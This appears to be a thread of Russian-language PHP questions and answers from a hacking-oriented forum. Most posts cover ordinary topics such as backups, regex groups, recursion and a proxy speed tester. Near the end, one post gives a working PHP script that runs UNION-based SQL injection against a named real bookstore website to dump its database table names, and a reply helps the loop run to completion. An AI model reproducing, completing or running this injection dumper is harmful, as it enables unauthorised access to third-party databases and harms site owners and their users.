В Unix- системах для отделения одной строки от другой используется \n , a в Windows \r\n. Так что надо смотреть ещё, что за сервак.
Почитай о контролле версий (например SVN (более новая система), CVS(болея старая система)) А оболочка, ну я использую pdt eclipse + SVN, советую, там и другого чень много полезного Там все детально описано для начала глянь еще SVN: http://subversion.org.ru/ - вроде как сейчас не пашет пс тьху блин, аватара , я себя был не признал
Пиветствую Вопрос касается даже больше архивирования чем РНР но все же как сделать РНР скрипт который бы при запуске бекапил в backup.tar.gz папку /home/mong/public_html/forum/ ? естественно с сохранением структуры каталогов и не удаляя файлы. ОСя FreeBSD c gzip
http://www.php.net/manual/ru/ref.zip.php Вот готовый класс Там с описанием Это если на PHP нужно... А так можно кроном(?) unix команды архивирования использовать
пишу тестилку проксиков на пхп засекаю время перед чтением с сокета через micotime() после завершения чтения засекаю второе время потом величину буфера делю на разницу времен и получаю вот эту шнягу Начальное время: 1214312272.3718 Конечное время: 1214312275.5016 Разница: 3.129772901535 Скорость равна:6011.9377961166 PHP: <? $wr_pic="http://www.2ip.ru"; $proxy = "82.94.187.199"; $port = 1080; $buffer=""; $fp = fsockopen($proxy, $port); fputs($fp, "GET $wr_pic HTTP/1.0\r\nHost: $proxy\r\n\r\n"); $time=0; $time2=0; $time=microtime(true); while(!feof($fp)){ $buffer .= fread($fp,2500); } fclose($fp); $time2=microtime(true); $time3=0; $time3=$time2-$time; print "Начальное время: ".$time."<br>"; print "Конечное время: ".$time2."<br>"; print "Разница: ".$time3."<br>"; print "Скорость равна:".strlen($buffer)/$time3; ?> поидеи должен был получить кол-во байтов в секунду но чот выдача меня не очень радует))
Мда, как задолбали такие посты. Ну подними глаза. Тут же соседний топик!!! Даже называется: Books PHP http://forum.antichat.ru/threadnav8721-1-10.html
Дабавь еще туда "PHP это просто - прграмируем для Web сайта". Очень познавательная книга для новичка(я по ней когда-то учился). Охватывает вопросы работы с файлами, базой данных. Так же рассматриваются CMS. Очень полезная книга - советую!
Извините за ламерский вопрос: У меня есть руглярка: PHP: preg_match('/<a>(.*?)<\/a>/',$d,$d); Какой оператор мне применить, что бы выхватило только (.*?), без тегов <a></a>?
Так оно и будет выхватывать то что в скобках отдельно. Просто обратись к нужно му элементу массива где будет лежать этот карман. сделай вывод результатов вот так print_r ($d) и увидешь какой тебе нужен элемент.
Что-то немного подвис на мысли как сохранить массив $result при рекурсивном вызове функции getcurpos, чтобы все значения хранились в нем, а не только последняя выборка. Ситуация следующая: PHP: class Curpos_m extends Model { .... function getcurpos($id) { $this->db->select('id, pid, title'); $this->db->where('id', $id); $this->db->limit(1); $query = $this->db->get('ai_menu_'.$this->table); $data = $query->result_array(); global $pid; foreach ($data as $key) { $pid = $key['pid']; } $result[$pid] = $data; if($pid != -1) { $this->getcurpos($pid); } else { return $result; } } }
Или пересмотри саму функцию, например делай дополнение в массив, после рекурсивного вызова в этой же функции, Или делай массив $result - СТАТИЧЕСКИМ
вопрос появился.. пишу дампер таблички information_schema.tables... PHP: <?php $host = 'www.llewellyn.com'; $fp = fsockopen($host, 80, $errno, $errstr, 30); $pos = 0; $pos1 = 0; $i1 = 131; $tableName = ''; if (!$fp) { echo "$errstr ($errno)<br />\n"; exit; } for ($i=1; $i<$i1;$i++) { $out = 'GET /bookstore/author.php?id=-48208+union+select+1,2,3,concat(0x7c3a7c3a,table_schema,0x2e,table_name,0x3a7c3a7c),5,null,null,null,9,10,11,12+from+information_schema.tables+limit+'.$i.',1/*'." HTTP/1.1\r\n"; $out .= "Host: ".$host."\r\n"; $out .= "User-Agent: LOL/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; $out .= "Connection: Close\r\n\r\n"; while (!feof($fp)) { $packet = fgets($fp); fwrite($fh,$packet); $pos = strpos($packet,'|:|:'); $pos1 = strpos($packet,':|:|'); $tableName = substr($packet, $pos+4, $pos1 - $pos - 4); if (($pos) and ($pos1)) { echo " pos: $pos\n pos1: $pos1\n table name: $tableName\n"; } } $out = ''; } fclose($fp); ?> появилась проблема... цикл for не работает.. точнее он проходит один шаг и завершается.. "кто виноват/ что делать?" (с)
Значит за 30 секунд цикл не успевает сделать 131 запрос к серверу, убирай ограничение на время выполнения скрипта set_time_limit(0); ini_set("max_execution_time",0);